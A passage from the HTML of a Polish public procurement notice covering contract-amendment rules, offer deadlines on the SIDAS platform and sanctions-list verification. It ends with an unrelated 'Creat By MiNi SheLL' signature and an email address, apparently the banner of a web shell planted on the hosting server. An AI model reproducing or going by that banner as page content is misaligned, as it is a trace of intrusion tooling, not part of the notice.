przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.Zmiana istotnych postanowień niniejszej Umowy w stosunku do treści oferty może nastąpić za zgodą Stron wyrażoną w formie pisemnej pod rygorem nieważności, w następujących okolicznościach: 1)przedłużenia okresu na jaki Umowa została zawarta w stosunku do okresu, o którym mowa w § 3 ust. 1 w przypadku niewykorzystania maksymalnej liczby rezerwacji, o której mowa w § 1 ust. 3 w terminie, o którym mowa w § 3 ust. 1, przy czym okres o jaki w takim przypadku zostanie przedłużony czas trwania Umowy nie przekroczy 3 miesięcy. 2)zmian związanych ze zmianami powszechnie obowiązujących przepisów prawa obowiązujących w dniu zawarcia Umowy; 3)zmiany podwykonawców, w szczególności zmiany albo rezygnacji z podwykonawcy, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 118 ust. 1 ustawy Pzp, z uwzględnieniem postanowień § 8 Umowy; 4)zmiany wysokości wynagrodzenia należnego Wykonawcy, w przypadku zmiany stawki podatku od towarów i usług. W przypadku zmiany wysokości podatku VAT, cena jednostkowa brutto zostanie zmieniona odpowiednio do zmian wysokości podatku VAT i będzie obowiązywać od dnia wejścia w życie zmienionej stawki VAT, cena jednostkowa netto pozostanie bez zmian 5)zmiany rachunku bankowego, o którym mowa w § 5 ust. 4; 6)w przypadku zmiany ceny materiałów lub kosztów zawiązanych z realizacją zamówienia na podstawie art. 439 ustawy Pzp, na zasadach określonych w § 12. 2.W przypadku przedłużenia terminu realizacji Umowy, o którym mowa w ust. 1 pkt 1 niniejszego paragrafu, Zamawiający przewiduje możliwość zmiany wynagrodzenia należnego Wykonawcy w zakresie dotyczącym niezrealizowanej części przedmiotu Umowy, w przypadku, gdy w trakcie obowiązywania Umowy doszło do zmiany: 1)wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę (t.j. Dz. U. z 2020 r., poz. 2207 ze zm.);2)zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne; 3)zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych (t.j. Dz. U. z 2023 r., poz. 46 ze zm.)- jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę. 3.Z zastrzeżeniem wyjątków przewidzianych w innych postanowieniach Umowy ustala się następujące zasady wprowadzania zmian, o których mowa w ust. 1 pkt 1 i ust. 2:1)w przypadkach określonych w ust. 1 pkt 1 i ust. 2 Wykonawca, w terminie nie dłuższym niż 14 dni od dnia zaistnienia podstawy do zmiany, a w szczególności wejścia w życie nowych przepisów lub podpisania aneksu w zakresie dotyczącym przedłużenia okresu trwania Umowy, może zwrócić się do Zamawiającego z wnioskiem o zmianę wynagrodzenia. W przypadku zmian dotyczących zmiany wynagrodzenia wraz z wnioskiem, Wykonawca będzie zobowiązany pisemnie przedstawić Zamawiającemu szczegółową kalkulację uzasadniającą wzrost kosztów, wynikający ze zmiany przepisów określonych w ust. 2. Jeżeli Wykonawca we wskazanym wyżej terminie nie zwróci się do Zamawiającego o zmianę wynagrodzenia, Zamawiający uzna, iż zmiany przepisów nie mają wpływu na koszty wykonania zamówienia przez Wykonawcę; 2)Zamawiający dokona analizy wniosku w terminie nie dłuższym niż 7 dni od dnia jego otrzymania. Zamawiający ma możliwość żądać od Wykonawcy przedłożenia dodatkowych wyjaśnień i dowodów odnośnie wniosku, w szczególności w przypadku, jeżeli uzna, że przedstawiona kalkulacja nie potwierdza wzrostu kosztów wykonania zamówienia, w wysokości zaproponowanej przez Wykonawcę; 3)zmiana Umowy nastąpi po wyrażeniu zgody przez Zamawiającego na zmianę oraz po podpisaniu aneksu do umowy i może dotyczyć wyłącznie niezrealizowanej jeszcze części Umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-03-15 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Platformy SIDAS dostępnej pod adresem: https://zamowienia.sidaspzp.pl, logując się na uprzednio założone konto</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-03-15 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-04-13</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający w celu potwierdzenia braku podstaw wykluczenia z postępowania na podstawie przesłanek określonych w art.<br/>7 ust. 1 specustawy sankcyjnej, zastrzega, w toku prowadzonego postępowania, możliwość samodzielnego weryfikowania<br/>aktualności listy sankcyjnej, o której mowa w art. 2 pkt 1 ustawy sankcyjnej (dostęp pod adresem:<br/>https://www.gov.pl/web/mswia/lista-osob-i-podmiotow-objetych-sankcjami ), czy też weryfikacji ogólnodostępnych rejestrów,<br/>w tym Centralnej Ewidencji i Informacji o Działalności Gospodarczej, Krajowego Rejestru Sądowego oraz w Centralnym<br/>Rejestrze Beneficjentów Rzeczywistych (dostęp pod adresem: https://crbr.podatki.gov.pl/adcrbr/#/wyszukaj. W<br/>uzasadnionych przypadkach Zamawiający będzie żądał innych koniecznych dokumentów i oświadczeń, w szczególności<br/>poświadczonego przez Wykonawcę za zgodność z oryginałem wyciągu z księgi udziałów (art. 188 KSH) lub rejestru<br/>akcjonariuszy (art. 328(1) KSH)

Creat By MiNi SheLL
Email: jattceo@gmail.com